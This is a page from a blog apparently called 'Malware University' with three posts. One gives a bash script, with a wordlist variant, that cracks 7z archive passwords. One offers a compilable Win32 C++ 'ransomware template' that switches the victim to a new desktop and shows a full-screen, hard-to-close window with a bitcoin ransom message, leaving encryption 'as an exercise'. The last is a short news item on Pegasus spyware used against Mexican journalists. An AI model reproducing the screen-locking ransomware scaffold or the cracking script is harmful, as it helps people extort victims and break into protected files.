
Malware University

Class is in Session


Month: December 2020

7zip Password Cracker (BASH)

Posted on December 21, 2020 by admin

Dependency: p7zip, which provides the 7z command (on Debian/Ubuntu that is the p7zip-full package; plain p7zip ships only 7zr). p7zip is the POSIX port of 7-Zip, not a GNU package.

#!/bin/bash
# @(#) p7crack -- Password crack a target 7z file
# Usage:  ./p7crack.sh <target_file>

[ $# -eq 1 ] || { echo "Usage: $0 <target_file>" >&2; exit 2; }

# Candidate passwords; replace with your own list.
declare -a LIST=(password1 password2 password3)

for x in "${LIST[@]}"; do
   # -y answers any prompt and -p supplies the password, so 7z never blocks asking for one.
   # 7z exits 0 only when the archive actually unpacks; a wrong password exits 2 and falls through.
   if 7z x -y -p"${x}" -- "${1}" >/dev/null 2>&1; then
      echo "${x} is the password"
      exit 0
   fi
done

echo "no candidate matched" >&2
exit 1
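A wordlist-driven variant, added here as an example and not part of the original post. It differs from the script above in three ways: candidates come from a file, each guess uses `7z t` (test) so nothing is written to disk until the password is known, and the search stops at the first hit. It assumes the `7z` binary from p7zip is on PATH, that the wordlist has one candidate per line, and that the archive really is password-protected (7z accepts any `-p` value for an unencrypted archive, so the very first candidate would "match").

```shell
#!/bin/bash
# p7crack-wordlist.sh -- added example, not code from the original post.
# Try every line of a wordlist as the password of a 7z archive using `7z t`.
# Assumes: `7z` (p7zip) on PATH; one candidate per line in the wordlist.

p7_test_password() {
    # $1 = archive, $2 = candidate. Returns 0 iff 7z accepts the password.
    # -y answers prompts, -p gives the password, `--` ends switch parsing so an
    # archive name starting with '-' is safe. stdin is detached so 7z can never
    # consume wordlist lines from the loop's redirected stdin.
    7z t -y -p"$2" -- "$1" </dev/null >/dev/null 2>&1
}

p7_crack() {
    # $1 = archive, $2 = wordlist.
    # Prints the first matching password and returns 0; returns 1 when the list
    # is exhausted and 2 on bad arguments.
    local archive="$1" wordlist="$2" pw tried=0
    [ -r "$archive" ]  || { echo "cannot read archive: $archive" >&2; return 2; }
    [ -r "$wordlist" ] || { echo "cannot read wordlist: $wordlist" >&2; return 2; }
    # `|| [ -n "$pw" ]` also tries a last line that lacks a trailing newline.
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -n "$pw" ] || continue           # a bare -p would make 7z prompt; skip empties
        tried=$((tried + 1))
        if p7_test_password "$archive" "$pw"; then
            printf '%s\n' "$pw"
            return 0
        fi
    done < "$wordlist"
    echo "no match after $tried candidates" >&2
    return 1
}

# Run as a script: ./p7crack-wordlist.sh <archive.7z> <wordlist>
[ $# -eq 0 ] || p7_crack "$@"
```

Every guess costs a full key derivation (7-Zip runs 2^19 SHA-256 rounds by default), so a shell loop that spawns 7z per candidate is slow; keep the wordlist targeted rather than trying to brute-force from it. Testing instead of extracting also avoids leaving partially written, garbage plaintext files behind on every wrong guess.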
Posted in Utilities

Generic Win32 Ransomware Template

Posted on December 20, 2020 by admin

The following is a basic C++ skeleton for Win32 ransomware projects. It creates a fresh desktop object, switches the interactive session to it, and draws a full-screen topmost window there, so the user sees only your window and cannot reach their own desktop until the process switches back. The file encrypting, transporting, ransoming, destruction, etc., is left as an exercise to the reader.

#include <Windows.h>
#include <WinGDI.h>
#include <CommCtrl.h>
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "comctl32.lib")

// Identifiers and globals the template uses but the original post left undeclared.
#define IDC_BUTTON0     1001
#define WND_CLASS_NAME0 L"LockWndClass0"

static HINSTANCE instance       = NULL;
static HFONT     h_font         = NULL;
static HWINSTA   hWinsta        = NULL;
static HDESK     hDesktop       = NULL;  // the desktop we create and show
static HDESK     hOldDesktop    = NULL;  // the user's original desktop, restored in DeInit
static HWND      hWindow0       = NULL;
static HANDLE    hThreadWindow0 = NULL;

// Register the lock window's class. Classes are per-process, but the window itself must be
// created by a thread that is bound to hDesktop, which is why Window0Thread exists.
static ATOM RegisterClasses(WNDPROC proc, LPCWSTR className)
{
	WNDCLASSEXW wc = { 0 };
	wc.cbSize        = sizeof(wc);
	wc.lpfnWndProc   = proc;
	wc.hInstance     = instance;
	wc.hCursor       = LoadCursorW(NULL, IDC_ARROW);
	wc.hbrBackground = (HBRUSH) (COLOR_WINDOW + 1);
	wc.lpszClassName = className;
	return RegisterClassExW(&wc);
}

// Standard message pump; returns once PostQuitMessage() is called from WndProc0.
static void MessageLoop()
{
	MSG msg;
	while (GetMessageW(&msg, NULL, 0, 0) > 0)
	{
		TranslateMessage(&msg);
		DispatchMessageW(&msg);
	}
}

void CreateWndContent0(HWND parent)
{
	HWND wnd;
	// The class is "BUTTON"; "BTN" is not a registered class and CreateWindowExW would return NULL.
	// The original magic 0x50012F00 is WS_CHILD | WS_VISIBLE | WS_TABSTOP | BS_CENTER | BS_VCENTER | BS_MULTILINE.
	wnd = CreateWindowExW(0, L"BUTTON", L"btn",
			WS_CHILD | WS_VISIBLE | WS_TABSTOP | BS_CENTER | BS_VCENTER | BS_MULTILINE,
			50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
	SendMessageW(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}

LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
	switch (msg)
	{
		case WM_CREATE:
			CreateWndContent0(hwnd);
			break;

		case WM_COMMAND:
			switch (LOWORD(wparam))
			{
				case IDC_BUTTON0:
					MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
					// DestroyWindow() performs the real teardown and sends WM_DESTROY itself;
					// sending WM_DESTROY by hand (as the original did) leaves the window alive.
					DestroyWindow(hwnd);
					break;
			}
			break;

		case WM_SYSCOMMAND:
			// Swallow system commands (Alt+F4, move, minimize, ...) instead of passing them to
			// DefWindowProc. This is what keeps the window from being closed from the frame.
			return 0;

		case WM_DESTROY:
			PostQuitMessage(0);
			break;

		default:
			return DefWindowProcW(hwnd, msg, wparam, lparam);
	}
	return 0;
}

HWND CreateWnd0()
{
	HWND wnd;
	// Size the window to the primary display instead of hard-coding 1920x1080.
	int cx = GetSystemMetrics(SM_CXSCREEN);
	int cy = GetSystemMetrics(SM_CYSCREEN);
	wnd = CreateWindowExW(0, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, cx, cy, NULL, NULL, instance, NULL);
	hWindow0 = wnd;
	SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
	ShowWindow(wnd, SW_SHOWNORMAL);
	UpdateWindow(wnd);
	return wnd;
}

DWORD WINAPI Window0Thread(LPVOID param)
{
	(void) param;
	SetThreadDesktop(hDesktop); // Every window this thread creates lands on the new desktop.
	RegisterClasses(WndProc0, WND_CLASS_NAME0);
	CreateWnd0();
	MessageLoop();
	return 0;
}

namespace Window
{
	// EnumWindows callback that hides every top-level window except our own. It must be
	// BOOL CALLBACK (int return), not bool, to match WNDENUMPROC. The template declares it but
	// never calls it; wire it up with EnumWindows(HideWindowProc, 0) if you want that behaviour.
	BOOL CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
	{
		(void) lParam;
		if (GetAncestor(hwnd, GA_ROOTOWNER) == hWindow0)
			return TRUE;
		ShowWindow(hwnd, SW_HIDE);
		return TRUE;
	}

	bool Init(HINSTANCE hInstance)
	{
		instance = hInstance;
		InitCommonControls();
		h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
				0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
				DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");

		hWinsta = GetProcessWindowStation(); // The interactive station. This handle must never be closed.
		hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
		hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", NULL, NULL, 0, GENERIC_ALL, NULL);
		if (hDesktop == NULL)
			return false;
		SetThreadDesktop(hDesktop); // All windows created under this desktop.
		SwitchDesktop(hDesktop);    // Take control of what the user sees. Show them the message.

		// The window lives on its own thread: a thread can only SetThreadDesktop() before it owns
		// any windows or hooks, so the UI thread binds itself to hDesktop first thing.
		hThreadWindow0 = CreateThread(NULL, 0, Window0Thread, NULL, 0, NULL);
		return hThreadWindow0 != NULL;
	}

	void DeInit()
	{
		SwitchDesktop(hOldDesktop); // Restore the old, original, desktop. Because you're a nice boy ;)
		if (hThreadWindow0 != NULL)
		{
			// Stop the UI thread before closing the desktop it is bound to.
			PostThreadMessageW(GetThreadId(hThreadWindow0), WM_QUIT, 0, 0);
			WaitForSingleObject(hThreadWindow0, 5000);
			CloseHandle(hThreadWindow0);
			hThreadWindow0 = NULL;
		}
		CloseDesktop(hDesktop);
		// No CloseWindowStation(hWinsta): GetProcessWindowStation() returns a handle the process owns.
		if (h_font != NULL)
			DeleteObject(h_font);
	}
}

int WINAPI wWinMain(HINSTANCE hInst, HINSTANCE, LPWSTR, int)
{
	if (!Window::Init(hInst))
		return 1;
	WaitForSingleObject(hThreadWindow0, INFINITE); // Returns when the button destroys the window.
	Window::DeInit();
	return 0;
}
Posted in Malware Development | Tagged c++, ransomware, template, win32

Mexican Cartels Deploying Lawful Intercept Software

Posted on December 20, 2020 by admin

A group known as the Cartel Project has released a report detailing the targeting of citizen journalists throughout Mexico who report on cartel dealings. The watchdog group Citizen Lab confirmed that one of them, Jorge Carrasco, was targeted with Pegasus, the spyware sold by the Israeli NSO Group.

Citizen Lab has found at least nine journalists in Mexico targeted with Pegasus. While it is doubtful that NSO Group sells to cartels directly, the Mexican government is a known customer of various "lawful intercept" vendors, NSO Group included. The likely route is that the software ends up in the hands of cartel operators through insiders working within the Mexican government.

It is not known whether the eight journalists killed during 2020 in Mexico were targeted with such spyware.

Posted in Current Events | Tagged cartels, israel, lawful intercept, mexico, nso group
